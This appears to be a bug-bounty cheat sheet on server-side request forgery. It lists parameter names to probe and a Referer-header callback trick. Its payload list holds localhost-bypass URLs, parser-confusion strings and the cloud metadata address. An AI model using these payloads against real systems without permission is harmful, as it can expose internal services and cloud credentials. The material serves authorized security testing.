Notes

SSRF

Exploit

Section titled “Exploit”

Finding ssrf

Section titled “Finding ssrf”

URL parameters

Section titled “URL parameters”
url=
targetUrl=
requestUrl=
path=

API, webhooks

Section titled “API, webhooks”

Look for developer portal, e.g. developer.example.com, example.com/developer

Open redirects

Section titled “Open redirects”

Find open redirects and chain SSRF.

go
return
r_url
returnUrl
returnUri
locationUrl
goTo
return_url
return_uri
ref=
referrer=
backUrl
returnTo
successUrl

Referer header

Section titled “Referer header”

Simply set Referer: https://www.yourdomain.com and start logging requests via your own private collaborator server.

GET / HTTP/1.1
Host: victim.com
Referer: https://www.yourdomain.com

PDF generators

Section titled “PDF generators”

Hunting for SSRF Bugs in PDF Generator

Payload

Section titled “Payload”
http://127.0.0.1:80
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://spoofed.burpcollaborator.net
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost
http://127.127.127.127
http://2130706433/ = http://127.0.0.1
http://[0:0:0:0:0:ffff:127.0.0.1]
localhost:+11211aaa
http://0/
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
http://169.254.169.254
0://evil.com:80;http://google.com:80

Tools

Section titled “Tools”

Capturing incoming requests

Section titled “Capturing incoming requests”